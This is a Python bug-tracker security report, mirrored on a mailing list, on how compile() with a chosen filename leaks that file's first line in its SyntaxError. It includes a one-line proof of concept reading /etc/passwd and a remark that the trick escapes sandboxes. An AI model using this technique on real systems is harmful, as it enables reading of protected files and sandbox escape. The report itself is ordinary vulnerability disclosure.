[issue38985] `compile` returns the first line of file on termination

Koh Fri, 06 Dec 2019 01:29:43 -0800


New submission from Koh <kohyouli...@gmail.com>:


By specifying a filename in the compile function and then improperly 
terminating it, we are able to return the first line of any file.

>> compile('yield', '/etc/passwd', 'exec')
File "/etc/passwd", line 1
    root:x:0:0:root:/root:/bin/bash
    ^
SyntaxError: 'yield' outside function

Is this intended behavior? I have been able to use it to escape sandboxes.

----------
messages: 357906
nosy: iso
priority: normal
severity: normal
status: open
title: `compile` returns the first line of file on termination
type: security
versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue38985>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue38985] `compile` returns the first line of file on termination

Reply via email to